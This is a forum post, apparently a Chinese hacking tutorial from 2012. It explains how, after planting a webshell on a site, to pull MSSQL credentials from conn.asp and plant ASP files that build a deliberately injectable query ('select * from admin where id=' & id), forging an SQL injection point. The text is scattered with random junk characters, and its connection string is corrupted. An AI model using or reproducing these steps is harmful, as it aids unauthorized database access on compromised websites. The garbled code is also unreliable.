首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
0 @" q3 b# }# |5 O0 k+ gASP/Visual Basic代码* o' [! r# k5 r' ?( L% m- V
<!--#include file="xx.asp"-->
; S8 T4 G# ^+ b2 x& ~* m<%
- q3 H. g* w( F3 ~ H! D% j2 M aset rs=server.createobject("ADODB.recordset") ' H/ T' A* p2 X* E' r$ I
id = request("id")
. J$ v Y/ d$ H9 B& istrSQL = "select * from admin where id=" & id
/ X: h K* w$ m$ J+ P: ]* mrs.open strSQL,conn,1,3
& X7 p$ Z/ f" Hrs.close % i: r; l/ v. x4 d$ [( x
%> * {; H. I' w+ B* ]1 e1 \
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
/ S9 P# d# y0 y& c5 ^' U" l然后就要构造一个连接数据库的文件了,代码如下:
8 {. l& a6 v/ t' A& F5 s4 dASP/Visual Basic代码. w6 x5 U$ C" S$ X- J% `
<%
8 T3 [, ]# `* _strSQLServerName = "000.000.000.000" '服务器名称或地址 ) h! H1 a2 v/ v' j: C
strSQLDBUserName = "sqlname" '数据库帐号 8 ^& H+ I, n& q3 W
strSQLDBPassword = "sqlpass" '数据库密码
7 @& D8 f& N% H1 s6 P4 zstrSQLDBName = "sqldataname" '数据库名称 ! t; i( C0 ?( Y% U! f
Set conn = Server.CreateObject("ADODB.Connection") 1 L; p& b5 ?. v% V C3 r
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";" * H) X8 d( I. Z" ?
conn.open strCon 0 U0 d, |: z- \" W
%>
" Z2 o- g7 Q) q# n这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功- k; V; k3 }" |; _3 l
|
发表于 2012-9-13 17:53:08
收藏
支持
反对